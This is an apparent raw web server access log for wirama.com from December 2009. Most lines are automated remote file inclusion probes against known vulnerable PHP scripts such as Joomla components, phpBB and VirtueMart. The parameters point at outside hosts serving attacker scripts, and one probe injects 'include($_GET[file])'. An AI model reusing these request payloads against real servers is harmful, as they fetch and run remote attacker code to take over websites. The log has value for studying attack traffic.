200.58.71.90 - - [01/Dec/2009:06:38:57 -0800] "GET /logs/access_090731.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.120.76.58 - - [01/Dec/2009:06:40:15 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.120.76.58 - - [01/Dec/2009:06:40:15 -0800] "GET /logs/access_090801.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.120.76.58 - - [01/Dec/2009:06:40:15 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.72.254.214 - - [01/Dec/2009:06:46:05 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.72.254.214 - - [01/Dec/2009:06:46:05 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.72.254.214 - - [01/Dec/2009:06:46:05 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.72.254.214 - - [01/Dec/2009:06:54:23 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.72.254.214 - - [01/Dec/2009:06:54:24 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.72.254.214 - - [01/Dec/2009:06:54:24 -0800] "GET /logs/access_090501.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.72.254.214 - - [01/Dec/2009:06:54:38 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.250.230.32 - - [01/Dec/2009:06:54:43 -0800] "GET /jobs.html HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
65.55.106.207 - - [01/Dec/2009:06:59:48 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.207 - - [01/Dec/2009:07:00:30 -0800] "GET /?M=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
114.108.177.238 - - [01/Dec/2009:07:00:55 -0800] "GET /logs/access_090501.log///?_SERVER[DOCUMENT_ROOT]=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:07:00:55 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://anginbali.com/1.jpg?? HTTP/1.1" 200 3518 "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:07:00:55 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://anginbali.com/1.jpg?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
61.72.254.214 - - [01/Dec/2009:07:07:12 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:07:08:24 -0800] "GET /logs/access_090501.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.171.225.234 - - [01/Dec/2009:07:09:02 -0800] "GET /?phpbb_root_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
213.171.225.234 - - [01/Dec/2009:07:09:02 -0800] "GET /logs/?phpbb_root_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 3512 "-" "Mozilla/5.0" "www.wirama.com"
213.171.225.234 - - [01/Dec/2009:07:09:03 -0800] "GET /logs/access_091101.log/?phpbb_root_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.171.225.234 - - [01/Dec/2009:07:11:42 -0800] "GET /?phpbb_root_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
213.171.225.234 - - [01/Dec/2009:07:11:43 -0800] "GET /logs/access_091101.log/?phpbb_root_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.171.225.234 - - [01/Dec/2009:07:11:43 -0800] "GET /logs/?phpbb_root_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 3512 "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:07:12:52 -0800] "GET /logs/access_090801.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
94.23.238.192 - - [01/Dec/2009:07:18:52 -0800] "GET /logs/access_090329.log HTTP/1.0" 200 1685256 "http://wirama.com/logs/access_090329.log" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:07:24:00 -0800] "GET /logs/access_090501.log//errors.php?error=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:07:24:00 -0800] "GET /errors.php?error=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:07:24:00 -0800] "GET /logs//errors.php?error=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:07:24:18 -0800] "GET /logs/access_090501.log%20%20//errors.php?error=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:07:24:18 -0800] "GET /errors.php?error=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:07:24:18 -0800] "GET /logs//errors.php?error=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.87.192.182 - - [01/Dec/2009:07:26:53 -0800] "GET //include/prodler.class.php?sPath=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.87.192.182 - - [01/Dec/2009:07:26:53 -0800] "GET /logs///include/prodler.class.php?sPath=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.87.192.182 - - [01/Dec/2009:07:26:53 -0800] "GET /logs/access.log///include/prodler.class.php?sPath=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:07:31:14 -0800] "GET /logs/access_090801.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:07:31:14 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:07:31:14 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:07:32:13 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:07:32:13 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:07:32:14 -0800] "GET /logs/access_090801.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:07:34:29 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:07:34:29 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:07:34:29 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:07:36:49 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:07:36:49 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:07:36:49 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:07:36:49 -0800] "GET /logs/access_090731.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:07:37:18 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:07:37:18 -0800] "GET /logs/access_090501.log//mail.inc.php?skin_board_path=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:07:37:18 -0800] "GET /mail.inc.php?skin_board_path=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:07:38:32 -0800] "GET /logs/access_090731.log//mail.inc.php?skin_board_path=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.22.2 - - [01/Dec/2009:07:38:42 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.22.2 - - [01/Dec/2009:07:38:42 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.22.2 - - [01/Dec/2009:07:38:43 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.22.2 - - [01/Dec/2009:07:38:53 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.22.2 - - [01/Dec/2009:07:38:53 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.22.2 - - [01/Dec/2009:07:38:53 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.22.2 - - [01/Dec/2009:07:39:08 -0800] "GET /logs/access_090329.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.22.2 - - [01/Dec/2009:07:39:37 -0800] "GET /logs/access_090329.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.21 - - [01/Dec/2009:07:43:58 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
114.108.177.238 - - [01/Dec/2009:07:51:50 -0800] "GET //vwar/backup/errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:07:51:50 -0800] "GET /logs///vwar/backup/errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:07:51:51 -0800] "GET /logs/access_090329.log%20%20///vwar/backup/errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:07:51:54 -0800] "GET //vwar/backup/errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:07:51:54 -0800] "GET /logs///vwar/backup/errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:07:51:54 -0800] "GET /logs/access_090329.log%20%20///vwar/backup/errors.php?error=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.207.21 - - [01/Dec/2009:07:55:26 -0800] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
210.127.209.27 - - [01/Dec/2009:08:01:51 -0800] "GET /logs/access_090329.log%20%20////?include_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:08:01:51 -0800] "GET ///?include_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:08:01:51 -0800] "GET ///?include_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:08:01:51 -0800] "GET /logs////?include_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 3519 "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:08:01:52 -0800] "GET /logs/access_090329.log%20%20////?include_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:08:01:52 -0800] "GET /logs////?include_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 3519 "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:08:04:39 -0800] "GET ///?include_path=http://www.kimhae.kg.kr/bbs/data/week/1148830776/idxx.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:08:04:39 -0800] "GET ///?include_path=http://www.kimhae.kg.kr/bbs/data/week/1148830776/idxx.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:08:04:39 -0800] "GET /logs////?include_path=http://www.kimhae.kg.kr/bbs/data/week/1148830776/idxx.txt? HTTP/1.1" 200 3519 "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:08:04:39 -0800] "GET /logs////?include_path=http://www.kimhae.kg.kr/bbs/data/week/1148830776/idxx.txt? HTTP/1.1" 200 3519 "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:08:04:39 -0800] "GET /logs/access_090329.log%20%20////?include_path=http://www.kimhae.kg.kr/bbs/data/week/1148830776/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:08:04:39 -0800] "GET /logs/access_090329.log%20%20////?include_path=http://www.kimhae.kg.kr/bbs/data/week/1148830776/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.198.132.126 - - [01/Dec/2009:08:08:49 -0800] "GET / HTTP/1.1" 200 916 "http://venturebeatprofiles.com/company/profile/wirama" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0" "www.wirama.com"
65.198.132.126 - - [01/Dec/2009:08:08:49 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0" "www.wirama.com"
216.151.188.131 - - [01/Dec/2009:08:08:56 -0800] "GET /logs/index.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
216.151.188.131 - - [01/Dec/2009:08:08:56 -0800] "GET /logs/access.log/index.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
216.151.188.131 - - [01/Dec/2009:08:08:56 -0800] "GET /index.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
216.151.188.131 - - [01/Dec/2009:08:09:02 -0800] "GET /logs/index.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
216.151.188.131 - - [01/Dec/2009:08:09:02 -0800] "GET /logs/access.log/index.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
216.151.188.131 - - [01/Dec/2009:08:09:02 -0800] "GET /index.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:08:12:50 -0800] "GET /logs/access_090501.log//mail.inc.php?skin_board_path=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:08:12:50 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:08:12:50 -0800] "GET /mail.inc.php?skin_board_path=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:08:13:24 -0800] "GET /logs/access_090731.log//mail.inc.php?skin_board_path=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.97.212.185 - - [01/Dec/2009:08:20:12 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:08:20:12 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:08:20:12 -0800] "GET /logs/access_090330.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:08:20:22 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:08:20:22 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:08:20:22 -0800] "GET /logs/access_090330.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.106.56 - - [01/Dec/2009:08:22:54 -0800] "GET /setup.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [01/Dec/2009:08:22:54 -0800] "GET /logs/access.log//setup.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [01/Dec/2009:08:22:54 -0800] "GET /logs//setup.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.209 - - [01/Dec/2009:08:23:16 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
70.87.64.234 - - [01/Dec/2009:08:23:58 -0800] "GET /logs/access_090330.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:08:24:14 -0800] "GET /logs/access_090330.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.209 - - [01/Dec/2009:08:24:25 -0800] "GET /?N=D HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.104.154 - - [01/Dec/2009:08:27:06 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
65.55.104.154 - - [01/Dec/2009:08:27:06 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
189.30.242.61 - - [01/Dec/2009:08:31:08 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.30.242.61 - - [01/Dec/2009:08:31:08 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.30.242.61 - - [01/Dec/2009:08:31:08 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.30.242.61 - - [01/Dec/2009:08:31:08 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.30.242.61 - - [01/Dec/2009:08:31:08 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.30.242.61 - - [01/Dec/2009:08:31:08 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:08:31:13 -0800] "GET /logs//error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:08:31:14 -0800] "GET /error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:08:31:14 -0800] "GET /logs/access_090501.log//error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.30.242.61 - - [01/Dec/2009:08:31:14 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.30.242.61 - - [01/Dec/2009:08:31:16 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [01/Dec/2009:08:32:29 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [01/Dec/2009:08:32:29 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [01/Dec/2009:08:32:29 -0800] "GET /logs/access_090801.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [01/Dec/2009:08:32:50 -0800] "GET /logs/access_090501.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:08:34:14 -0800] "GET /logs//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:08:34:14 -0800] "GET /logs/access_090501.log//error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:08:34:14 -0800] "GET /error.php?dir=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
